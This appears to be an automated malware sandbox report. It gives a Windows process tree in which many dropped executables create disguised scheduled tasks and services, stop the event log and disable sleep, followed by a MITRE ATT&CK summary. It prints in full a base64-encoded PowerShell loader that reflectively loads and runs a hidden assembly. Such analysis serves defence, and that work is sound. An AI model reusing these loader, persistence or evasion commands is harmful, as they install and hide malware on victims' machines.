C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i4⤵
- Executes dropped EXE
PID:5544
-
-
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s4⤵
- Executes dropped EXE
PID:5712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 7643⤵
- Program crash
PID:5948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\new.exe"C:\Users\Admin\AppData\Local\Temp\a\new.exe"2⤵PID:5644
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5384
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"2⤵PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\a\123p.exe"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"2⤵PID:5316
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:6104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:3992
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:5804
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:4528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
PID:4628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
PID:756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4452
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"2⤵PID:5552
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"3⤵PID:6132
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "4⤵PID:5928
-
C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"5⤵PID:316
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\huYSddReuh.bat"6⤵PID:5296
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:5588
-
-
C:\Users\Default User\sppsvc.exe"C:\Users\Default User\sppsvc.exe"7⤵PID:5724
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"2⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\u3yg.0.exe"C:\Users\Admin\AppData\Local\Temp\u3yg.0.exe"3⤵PID:4912
-
-
C:\Users\Admin\AppData\Local\Temp\u3yg.1.exe"C:\Users\Admin\AppData\Local\Temp\u3yg.1.exe"3⤵PID:1280
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"2⤵PID:5132
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe3⤵PID:5196
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"3⤵PID:568
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵PID:1256
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f4⤵
- Creates scheduled task(s)
PID:5292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"3⤵PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"2⤵PID:5052
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:5856
-
-
C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"3⤵PID:5404
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"2⤵PID:5524
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵PID:4868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵PID:5424
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"5⤵PID:5472
-
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"5⤵PID:3572
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4220
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"2⤵PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"2⤵PID:3812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5392
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"2⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\a\garits.exe"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"2⤵PID:2964
-
-
C:\Users\Admin\AppData\Local\Temp\a\current.exe"C:\Users\Admin\AppData\Local\Temp\a\current.exe"2⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\a\test.exe"C:\Users\Admin\AppData\Local\Temp\a\test.exe"2⤵PID:3372
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
C:\Windows\svchost.exeC:\Windows\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:5048
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
PID:4264
-
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"1⤵
- Executes dropped EXE
PID:6028 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:5328
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵PID:568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\BlockComponentwebMonitordhcp\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2632
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\BlockComponentwebMonitordhcp\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\WerFault.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3528
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\WerFault.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\WerFault.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Jufrxnb.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Jufrxnb" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "11111" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\1111.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵PID:3136
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:6084
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:1304
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:4404
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:4312
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4980
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:5600
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "1111" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\1111.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "11111" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\1111.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\VSSVC.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\VSSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "VSSVCV" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\VSSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Windows\Setup\State\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Setup\State\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\Setup\State\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "11111" /sc MINUTE /mo 6 /tr "'C:\Users\Public\AccountPictures\1111.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "1111" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\1111.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "11111" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\1111.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Windows\PrintDialog\pris\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\PrintDialog\pris\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Windows\PrintDialog\pris\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Windows\PrintDialog\pris\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\PrintDialog\pris\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5292
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Windows\PrintDialog\pris\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sunvox32s" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Saved Games\sunvox32.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5188
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sunvox32" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\sunvox32.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sunvox32s" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Saved Games\sunvox32.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Photo Viewer\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "gfhgfgjgfg" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\gfhgfgjgf.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "gfhgfgjgf" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\gfhgfgjgf.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "gfhgfgjgfg" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\gfhgfgjgf.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4412
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BrawlB0tB" /sc MINUTE /mo 11 /tr "'C:\BlockComponentwebMonitordhcp\BrawlB0t.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BrawlB0t" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\BrawlB0t.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BrawlB0tB" /sc MINUTE /mo 6 /tr "'C:\BlockComponentwebMonitordhcp\BrawlB0t.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2988
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵PID:1272
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵PID:5892
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a4c855 /state1:0x41c64e6d1⤵PID:5336
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Modify Registry
2Scripting
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Credential Access
Unsecured Credentials
4Credentials In Files
3Credentials in Registry
1Replay Monitor
